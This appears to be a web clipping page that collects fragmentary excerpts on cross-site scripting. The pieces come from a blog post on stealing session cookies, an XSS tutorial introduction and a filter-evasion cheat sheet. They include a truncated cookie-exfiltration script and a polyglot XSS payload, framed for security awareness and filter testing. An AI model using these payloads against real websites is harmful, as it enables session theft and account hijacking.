background preloader

XSS

Facebook Twitter

XSS - Stealing Cookies 101. Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago, doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client. A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October it reminded us that we must be vigilant in filtering text which users post because a hacker could smuggle in some javascript code to maliciously use the site from the browsers of authenticated users. By stealing a users cookies as the LiveJournal hack did, you don't even have to cary out the attack in the users browser; you can do it elsewhere.

Easy to do? <script> new Image().src=" </script> That was it. We can also use another method in IE. Any time you let users post text and you don't religiously restrict the content, they can steal sessions. So, you might want to start believing every session is stollen. If you are not familiar with the MySpace XSS hack, read up. Paper: Kr3w's Cross-Site Scripting Tutorial. Part I. What is XSS (Cross-Site Scripting)? XSS, short for what is known as Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage for important feedback. This feedback may contain many things; one, most commonly being the user's cookie. Now, for everybody reading this, I assume that you know what a cookie is and how it is used on webpage, but if not, I will explain it anyways.

A cookie is the variable that web-browsers use to store your login credentials. Part II. XSS is, in my opinion, the most common and dangerous exploit that exists on the internet today. Steve.org.uk - Computer Security - XSS. XSS (Cross Site Scripting) Cheat Sheet. Last revision (mm/dd/yy): 07/4/2018 This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters.

XSS (Cross Site Scripting) Cheat Sheet

Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate. Basic XSS Test Without Filter Evasion This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here): XSS Locator (Polygot) The following is a "polygot test XSS payload.

" javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> Image XSS using the JavaScript directive Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well: No quotes and no semicolon Case insensitive XSS attack vector HTML entities Malformed A tags <!

<!